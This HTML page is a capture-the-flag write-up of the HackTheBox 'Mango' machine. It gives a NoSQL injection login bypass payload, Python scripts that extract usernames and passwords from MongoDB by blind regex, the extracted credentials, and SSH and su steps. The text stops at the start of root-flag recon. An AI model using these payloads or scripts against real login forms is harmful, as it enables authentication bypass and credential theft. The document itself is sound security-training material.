<!DOCTYPE html>
<html lang=en>
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Mango just retired on HackTheBox, it was an Medium difficulty Linux box. As usual I really liked the whole exploration process especially the custom exploitation part and learned a bit about Mongodb">
<meta property="og:type" content="article">
<meta property="og:title" content="HackTheBox - Mango">
<meta property="og:url" content="https://hg8.sh/posts/mango/index.html">
<meta property="og:site_name" content="hg8&#39;s Notes — My notes about infosec world. Pentest&#x2F;Bug Bounty&#x2F;CTF Writeups.">
<meta property="og:description" content="Mango just retired on HackTheBox, it was an Medium difficulty Linux box. As usual I really liked the whole exploration process especially the custom exploitation part and learned a bit about Mongodb">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/82158122-27dc2580-9886-11ea-89a6-cf00163a1207.png">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/68053118-74498480-fceb-11e9-90d0-6509fb84711d.png">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/68054811-7b729180-fcef-11e9-9355-f813b1351cea.png">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/68114654-dd511800-fef6-11e9-9f7f-4868af23ac2a.png">
<meta property="article:published_time" content="2020-04-17T22:00:00.000Z">
<meta property="article:modified_time" content="2022-08-04T08:37:52.829Z">
<meta property="article:author" content="hg8">
<meta property="article:tag" content="linux">
<meta property="article:tag" content="gtfobins">
<meta property="article:tag" content="mango">
<meta property="article:tag" content="mongodb">
<meta property="article:tag" content="nosql injection">
<meta property="article:tag" content="setuid">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://user-images.githubusercontent.com/9076747/82158122-27dc2580-9886-11ea-89a6-cf00163a1207.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
     
    <title>HackTheBox - Mango :: hg8&#39;s Notes — My notes about infosec world. Pentest/Bug Bounty/CTF Writeups.</title>
    
<link rel="stylesheet" href="/css/style.css">

    
    
<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="hg8's Notes — My notes about infosec world. Pentest/Bug Bounty/CTF Writeups." type="application/atom+xml">
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/posts/openadmin/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/posts/traverxec/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
    </span>
    <br/>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#User-Flag"><span class="toc-number">1.</span> <span class="toc-text">User Flag</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Recon"><span class="toc-number">1.1.</span> <span class="toc-text">Recon</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#NoSQL-Injection"><span class="toc-number">1.2.</span> <span class="toc-text">NoSQL Injection</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Blind-NoSQL-data-extract"><span class="toc-number">1.3.</span> <span class="toc-text">Blind NoSQL data extract</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Pivot-mango-gt-admin"><span class="toc-number">1.4.</span> <span class="toc-text">Pivot mango -&gt; admin</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Root-Flag"><span class="toc-number">2.</span> <span class="toc-text">Root Flag</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Recon-1"><span class="toc-number">2.1.</span> <span class="toc-text">Recon</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#jjs-setuid-exploitation"><span class="toc-number">2.2.</span> <span class="toc-text">jjs setuid exploitation</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        <header id="header">
  <a href="/">
  
      <div id="logo" style="background-image: url(/images/logo.webp);"></div>
  
    <span class="logo__mark"></span>
    <span class="logo__text">./hg8.sh</span>
    <span class="logo__cursor"></span>
  </a>
  <div id="nav">
    <ul>
      <li class="icon">
        <a href="#"><i class="fas fa-bars fa-2x"></i></a>
      </li>
       
        <li><a href="/">Home</a></li>
       
        <li><a href="/about/">About</a></li>
       
        <li><a href="/archives/">Posts</a></li>
       
        <li><a href="/search/">Search</a></li>
      
    </ul>
  </div>
</header>

        
          <br>
          <br>
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        HackTheBox - Mango
    </h1>



    <div class="meta"> 
      
    <div class="postdate">
      
        <time datetime="2020-04-17T22:00:00.000Z" itemprop="datePublished">18-04-2020</time>
        
      
    </div>


      — Written by 
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">hg8</span>
      </span>
      —
      10 min read
    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <img width="572" alt="mango-hackthebox" src="https://user-images.githubusercontent.com/9076747/82158122-27dc2580-9886-11ea-89a6-cf00163a1207.png">

<p>Mango just retired on HackTheBox, it was an Medium difficulty Linux box. As usual I really liked the whole exploration process especially the custom exploitation part and learned a bit about Mongodb. I know I say this every-time but this box is my favorite box so far.</p>
<p><strong>Tl;Dr:</strong> User flag was accessible after exploiting an NoSQL injection flaw to extract usernames and passwords of accounts present on the box. Those credentials can be used to SSH login to the box as <code>mango</code> then pivoting to the <code>admin</code> user holding the flag by <code>su</code> to it using the password extracted previously.<br>The root flag was accessible by exploiting the <code>jjs</code> binary that have setuid bit set allowing to read and write files on the box as <code>root</code> user.</p>
<p>Alright! Let’s get into the details now!</p>
<hr>
<p>First thing first, let’s add the box IP to the host file:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ <span class="built_in">echo</span> <span class="string">&quot;10.10.10.162 mango.htb&quot;</span> &gt;&gt; /etc/hosts</span><br></pre></td></tr></table></figure>

<p>and let’s start!</p>
<h2 id="User-Flag"><a href="#User-Flag" class="headerlink" title="User Flag"></a>User Flag</h2><h3 id="Recon"><a href="#Recon" class="headerlink" title="Recon"></a>Recon</h3><p>Let’s start with the classic <code>nmap</code> scan to see which ports are open on the box:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ nmap -sV -sT -sC mango.htb</span><br><span class="line">Nmap scan report <span class="keyword">for</span> mango.htb (10.10.10.162)</span><br><span class="line">PORT    STATE SERVICE VERSION</span><br><span class="line">22/tcp  open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)</span><br><span class="line">80/tcp  open  http    Apache httpd 2.4.29 ((Ubuntu))</span><br><span class="line">|_http-server-header: Apache/2.4.29 (Ubuntu)</span><br><span class="line">|_http-title: 403 Forbidden</span><br><span class="line">443/tcp open  ssl/ssl Apache httpd (SSL-only mode)</span><br><span class="line">|_http-title: Mango | Search Base</span><br><span class="line">|_ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN</span><br><span class="line">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span><br><span class="line">Nmap <span class="keyword">done</span>: 1 IP address (1 host up) scanned <span class="keyword">in</span> 33.34 seconds</span><br></pre></td></tr></table></figure>

<p>We have a classical web apps running on port 80 and 443 and the SSH port 22 open. </p>
<p><code>nmap</code> scan display an interesting information about the SSL certificate on port 443:<br><code>staging-order.mango.htb</code>. Let’s add this <code>staging-order</code> to our <code>hosts</code> file since it can come useful in the future.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ <span class="built_in">echo</span> <span class="string">&quot;10.10.10.162 staging-order.mango.htb&quot;</span> &gt;&gt; /etc/hosts</span><br></pre></td></tr></table></figure>

<p>Opening <code>http://mango.htb</code> display a forbidden page while <code>https://mango.htb</code> display a search engine:</p>
<p><img src="https://user-images.githubusercontent.com/9076747/68053118-74498480-fceb-11e9-90d0-6509fb84711d.png" alt="mango search engine"></p>
<p><em>Note: Because Chrome wouldn’t display this page because of wrong certificate I completely skipped it before noticing it was accessible with Firefox. Because of that I accidentally avoided a big rabbit-hole. Win-Win.</em></p>
<p>Let’s fire <code>gobuster</code> to check if we can find interesting directories and/or pages there:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ gobuster dir -u http://mango.htb/ -w ~/SecLists/Discovery/Web-Content/big.txt -x php</span><br><span class="line">===============================================================</span><br><span class="line">Gobuster v3.0.1</span><br><span class="line">by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_)</span><br><span class="line">===============================================================</span><br><span class="line">/.htaccess (Status: 403)</span><br><span class="line">/.htpasswd (Status: 403)</span><br><span class="line">/server-status (Status: 403)</span><br></pre></td></tr></table></figure>

<p>Nothing here it seems… Let’s try port 443. We use option <code>-k</code> to skip SSL certificate verification:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ gobuster dir -u https://mango.htb/ -w ~/SecLists/Discovery/Web-Content/big.txt -x php -k</span><br><span class="line">===============================================================</span><br><span class="line">Gobuster v3.0.1</span><br><span class="line">by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_)</span><br><span class="line">===============================================================</span><br><span class="line">/.htaccess (Status: 403)</span><br><span class="line">/.htpasswd (Status: 403)</span><br><span class="line">/analytics.php (Status: 200)</span><br><span class="line">/index.php (Status: 200)</span><br><span class="line">/server-status (Status: 403)</span><br></pre></td></tr></table></figure>

<p>Not a lot of results but <code>analytics.php</code> sounds interesting. After a bit of research it turned out to be a rabbit hole I will skip it.</p>
<p>So what remain now ? Only <code>http://staging-order.mango.htb</code>. </p>
<p>Opening it display a classic login page :</p>
<p><img src="https://user-images.githubusercontent.com/9076747/68054811-7b729180-fcef-11e9-9355-f813b1351cea.png" alt="mango staging order">  </p>
<p><code>gobuster</code> doesn’t find any other interesting directories or pages so let’s focus on this login page.  </p>
<p>What do we first try when seeing a login page ? Injection of course!</p>
<p>After a few blind tries of common injection we don’t get any results. It’s kind of difficult to find the right payload because we don’t have any informations on the backend… </p>
<p>At this point I felt a bit out of ideas at this point to be honest. Taking a break helped me clear up my mind and think more carefully about the situation.  </p>
<p>Since we are on <code>hackthebox</code> we know that box name often give tips on what’s going on. So Mango…mango…mongo…mongodb? </p>
<p>Mongodb might be a nice start to try new techniques on this box. As a reminder:</p>
<blockquote>
<p>MongoDB is a cross-platform document-oriented database program. Classified as a NoSQL database program, MongoDB uses JSON-like documents with schema.<br><a target="_blank" rel="noopener" href="https://www.mongodb.com/">https://www.mongodb.com/</a></p>
</blockquote>
<p>Mongodb is a NoSQL database software, and, as for SQL, NoSQL can be exploited by injection if input is not properly sanitized.<br>A lot of example are available when searching on google. This <a target="_blank" rel="noopener" href="https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html">blog post</a> gives the following example to bypass a login form:</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">http://target/</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/x-www-form-urlencoded</span><br><span class="line">username[$ne]=test&amp;password[$ne]=test</span><br></pre></td></tr></table></figure>

<h3 id="NoSQL-Injection"><a href="#NoSQL-Injection" class="headerlink" title="NoSQL Injection"></a>NoSQL Injection</h3><p>Let’s give it a try ! </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">curl <span class="string">&#x27;http://staging-order.mango.htb/&#x27;</span> --data <span class="string">&quot;username[<span class="variable">$ne</span>]=test&amp;password[<span class="variable">$ne</span>]=test&amp;login=login&quot;</span> -v</span><br><span class="line">&gt; POST / HTTP/1.1</span><br><span class="line">&gt; Host: staging-order.mango.htb</span><br><span class="line">&gt; Content-Length: 49</span><br><span class="line">&gt; Content-Type: application/x-www-form-urlencoded</span><br><span class="line">&lt; HTTP/1.1 302 Found</span><br><span class="line">&lt; Date: Sat, 02 Nov 2019 20:56:09 GMT</span><br><span class="line">&lt; Server: Apache/2.4.29 (Ubuntu)</span><br><span class="line">&lt; location: home.php</span><br><span class="line">[...]</span><br></pre></td></tr></table></figure>

<p>This time we got a <code>302 Found</code>! Seems like the injection succeed and bypassed the login form. Let’s relaunch the request with <code>-L</code> flag to prevent <code>curl</code> from redirecting back to the login page:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ curl <span class="string">&#x27;http://staging-order.mango.htb/&#x27;</span> --data <span class="string">&quot;username[<span class="variable">$ne</span>]=test&amp;password[<span class="variable">$ne</span>]=test&amp;login=login&quot;</span> -L</span><br><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html lang=<span class="string">&quot;en&quot;</span>&gt;</span><br><span class="line">[...]</span><br><span class="line">&lt;h1&gt;Under Plantation&lt;/h1&gt;</span><br><span class="line">&lt;h2&gt;Sorry <span class="keyword">for</span> the inconvenience. We just started farming!&lt;/h2&gt;</span><br><span class="line">&lt;h3&gt;To contact us <span class="keyword">in</span> the meantime please email: admin@mango.htb&lt;br /&gt;</span><br><span class="line">We rarely look at our inboxes.&lt;/h3&gt;</span><br><span class="line">&lt;/main&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>

<p>Nothing there either… That’s disappointing. But we are definitely on the right track.  </p>
<h3 id="Blind-NoSQL-data-extract"><a href="#Blind-NoSQL-data-extract" class="headerlink" title="Blind NoSQL data extract"></a>Blind NoSQL data extract</h3><p>Let’s summarize what we knows:</p>
<ul>
<li>We can do NoSQL injection.</li>
<li>Successful injection will return <code>302 Found</code>.</li>
</ul>
<p>Those two informations are enough to allow us to blindly extract data from the Mongodb instance. Here is an example :</p>
<p>Using <a target="_blank" rel="noopener" href="https://docs.mongodb.com/manual/reference/operator/query/regex/"><code>$regex</code></a> we will be able to submit a regex by injection. If the regex have a match the server will return <code>302 Found</code>. This will allows us to extract data.</p>
<p>For example if sending the following payload<br><code>username[$regex]=^a&amp;password[$ne]=test</code> return:</p>
<ul>
<li><code>302 Found</code> means that the regex matched, so username start with a <code>a</code>. </li>
<li><code>200 OK</code> the regex did not match.</li>
</ul>
<p>Following this logic we can try with the next letter with regex <code>^ad</code>, <code>^adm</code>, <code>^admi</code> and <code>^admin</code> and so on until we get full username. You get the idea ? :) </p>
<p>And once we have the full username we can do the exact same to extract the password.</p>
<p>Having all of those informations in mind, we can craft a script to do the job for us :</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://staging-order.mango.htb&quot;</span></span><br><span class="line"></span><br><span class="line">username = <span class="string">&quot;&quot;</span></span><br><span class="line">password = <span class="string">&quot;&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    <span class="keyword">for</span> c <span class="keyword">in</span> string.ascii_letters+string.digits:</span><br><span class="line"></span><br><span class="line">        payload = &#123;</span><br><span class="line">            <span class="string">&quot;username[$regex]&quot;</span>: <span class="string">&quot;^&quot;</span>+username+c,</span><br><span class="line">            <span class="string">&quot;password[$ne]&quot;</span>: password</span><br><span class="line">        &#125;</span><br><span class="line">    </span><br><span class="line">        r = requests.post(url, data=payload, allow_redirects=<span class="literal">False</span>)</span><br><span class="line">    </span><br><span class="line">        <span class="keyword">if</span> r.status_code == <span class="number">302</span>:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">f&quot;[+] Found one more char : <span class="subst">&#123;username+c&#125;</span>&quot;</span>)</span><br><span class="line">            username += c</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>Let’s try that!</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ python extract_user.py</span><br><span class="line">[+] Found one more char : a</span><br><span class="line">[+] Found one more char : ad</span><br><span class="line">[+] Found one more char : adm</span><br><span class="line">[+] Found one more char : admi</span><br><span class="line">[+] Found one more char : admin</span><br></pre></td></tr></table></figure>

<p>So the user account is …. <code>admin</code>. I think we could have guessed it after all.</p>
<p>Let’s now tweak our script to do the same for extracting passwords: </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://staging-order.mango.htb&quot;</span></span><br><span class="line"></span><br><span class="line">username = sys.argv[<span class="number">1</span>]</span><br><span class="line">password = <span class="string">&quot;&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    <span class="keyword">for</span> c <span class="keyword">in</span> string.printable:</span><br><span class="line"></span><br><span class="line">        <span class="comment"># We skip characters that will be interpreted as regex</span></span><br><span class="line">        <span class="keyword">if</span> c <span class="keyword">not</span> <span class="keyword">in</span> [<span class="string">&#x27;*&#x27;</span>, <span class="string">&#x27;+&#x27;</span>, <span class="string">&#x27;.&#x27;</span>, <span class="string">&#x27;?&#x27;</span>, <span class="string">&#x27;|&#x27;</span>, <span class="string">&#x27;$&#x27;</span>]:</span><br><span class="line">    </span><br><span class="line">            payload = &#123;</span><br><span class="line">                <span class="string">&quot;username&quot;</span>: username,</span><br><span class="line">                <span class="string">&quot;password[$regex]&quot;</span>: <span class="string">&quot;^&quot;</span>+password+c</span><br><span class="line">            &#125;</span><br><span class="line">    </span><br><span class="line">            r = requests.post(url, data=payload, allow_redirects=<span class="literal">False</span>)</span><br><span class="line">    </span><br><span class="line">            <span class="keyword">if</span> r.status_code == <span class="number">302</span>:</span><br><span class="line">                <span class="built_in">print</span>(<span class="string">f&quot;[+] Found one more char : <span class="subst">&#123;password+c&#125;</span>&quot;</span>)</span><br><span class="line">                password += c</span><br></pre></td></tr></table></figure>

<p>Let’s launch it:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ python extract_password.py admin</span><br><span class="line">[+] Found one more char : t</span><br><span class="line">[+] Found one more char : t9</span><br><span class="line">[+] Found one more char : t9K</span><br><span class="line">[+] Found one more char : t9Kc</span><br><span class="line">[+] Found one more char : t9KcS</span><br><span class="line">[+] Found one more char : t9KcS3</span><br><span class="line">[+] Found one more char : t9KcS3&gt;</span><br><span class="line">[+] Found one more char : t9KcS3&gt;!</span><br><span class="line">[+] Found one more char : t9KcS3&gt;!0</span><br><span class="line">[+] Found one more char : t9KcS3&gt;!0B</span><br><span class="line">[+] Found one more char : t9KcS3&gt;!0B<span class="comment">#</span></span><br><span class="line">[+] Found one more char : t9KcS3&gt;!0B<span class="comment">#2</span></span><br></pre></td></tr></table></figure>

<p>While we could have bruteforced the <code>admin</code> username using a wordlist it definitely wouldn’t have been possible for the password. </p>
<p>We now have a username and a password (<code>admin</code>:<code>t9KcS3&gt;!0B#2</code>). What the first thing we do when we have those kind of informations ? Login to SSH of course:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ ssh admin@mango.htb</span><br><span class="line">admin@mango.htb<span class="string">&#x27;s password:</span></span><br><span class="line"><span class="string">Permission denied, please try again.</span></span><br></pre></td></tr></table></figure>

<p>Nop doesn’t work.</p>
<p>Then maybe another user account can be extracted from Mongodb instance, let’s tweak our regex to return an user that is not <code>admin</code>:</p>
<figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="deletion">- &quot;username[$regex]&quot;: &quot;^&quot;+username+c,</span></span><br><span class="line"><span class="addition">+ &quot;username[$regex]&quot;: &quot;^(?!admin)&quot;+username+c,</span></span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ python extract_user.py</span><br><span class="line">[+] Found one more char : m</span><br><span class="line">[+] Found one more char : ma</span><br><span class="line">[+] Found one more char : man</span><br><span class="line">[+] Found one more char : mang</span><br><span class="line">[+] Found one more char : mango</span><br></pre></td></tr></table></figure>

<p>We could have guessed this one aswell. Let’s get its password: </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ python extract_password.py mango</span><br><span class="line">[+] Found one more char : h</span><br><span class="line">[+] Found one more char : h3</span><br><span class="line">[+] Found one more char : h3m</span><br><span class="line">[+] Found one more char : h3mX</span><br><span class="line">[+] Found one more char : h3mXK</span><br><span class="line">[+] Found one more char : h3mXK8</span><br><span class="line">[+] Found one more char : h3mXK8R</span><br><span class="line">[+] Found one more char : h3mXK8Rh</span><br><span class="line">[+] Found one more char : h3mXK8RhU</span><br><span class="line">[+] Found one more char : h3mXK8RhU~</span><br><span class="line">[+] Found one more char : h3mXK8RhU~f</span><br><span class="line">[+] Found one more char : h3mXK8RhU~f&#123;</span><br><span class="line">[+] Found one more char : h3mXK8RhU~f&#123;]</span><br><span class="line">[+] Found one more char : h3mXK8RhU~f&#123;]f</span><br><span class="line">[+] Found one more char : h3mXK8RhU~f&#123;]f5</span><br><span class="line">[+] Found one more char : h3mXK8RhU~f&#123;]f5H</span><br></pre></td></tr></table></figure>

<p>Alright we have <code>mango</code>:<code>h3mXK8RhU~f&#123;]f5H</code>, let’s try to SSH again:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ ssh mango@mango.htb</span><br><span class="line">mango@mango.htb<span class="string">&#x27;s password:</span></span><br><span class="line"><span class="string">Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)</span></span><br><span class="line"><span class="string">Last login: Mon Nov  4 09:50:35 2019 from 10.10.15.27</span></span><br><span class="line"><span class="string">mango@mango:~$ id</span></span><br><span class="line"><span class="string">uid=1000(mango) gid=1000(mango) groups=1000(mango)</span></span><br><span class="line"><span class="string">mango@mango:~$ ls -l</span></span><br><span class="line"><span class="string">mango@mango:~$</span></span><br></pre></td></tr></table></figure>

<p>That’s a good step ahead! Unfortunately no user flag here… </p>
<h3 id="Pivot-mango-gt-admin"><a href="#Pivot-mango-gt-admin" class="headerlink" title="Pivot mango -&gt; admin"></a>Pivot mango -&gt; admin</h3><p>Let’s do a bit of enumeration:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">mango@mango:~$ ls -l /home</span><br><span class="line">drwxr-xr-x 2 admin admin 4096 Nov  4 10:07 admin</span><br><span class="line">drwxr-xr-x 5 mango mango 4096 Nov  4 09:31 mango</span><br><span class="line">mango@mango:~$ ls -l /home/admin</span><br><span class="line">-r-------- 1 admin admin   33 Sep 27 14:29 user.txt</span><br></pre></td></tr></table></figure>

<p>User <code>admin</code> holds the flag. Let’s try to access it using common method since we probably got its password (<code>t9KcS3&gt;!0B#2</code>):</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mango@mango:~$ sudo -u admin cat /home/admin/user.txt</span><br><span class="line">[sudo] password <span class="keyword">for</span> mango:</span><br><span class="line">mango is not <span class="keyword">in</span> the sudoers file.  This incident will be reported.</span><br></pre></td></tr></table></figure>

<p>Oops, obligatory xkcd</p>
<p><img src="https://user-images.githubusercontent.com/9076747/68114654-dd511800-fef6-11e9-9f7f-4868af23ac2a.png" alt="incident"></p>
<p>Maybe the simple <code>su</code> command then ?</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">mango@mango:~$ su - admin</span><br><span class="line">Password:</span><br><span class="line">$ id</span><br><span class="line">uid=4000000000(admin) gid=1001(admin) groups=1001(admin)</span><br><span class="line">$ bash</span><br><span class="line">admin@mango:/$ cat user.txt</span><br><span class="line">7xxxxxxxxxxxxxxxxxxxxx2</span><br></pre></td></tr></table></figure>

<p>Alright that was not that hard was it ? Let’s move on to the root flag.</p>
<h2 id="Root-Flag"><a href="#Root-Flag" class="headerlink" title="Root Flag"></a>Root Flag</h2><h3 id="Recon-1"><a href="#Recon-1" class="headerlink" title="Recon"></a>Recon</h3><p>One of the first I do while doing recon is to search for binaries with setuid bit enabled first. It’s always an easy way to privilege escalation.</p>
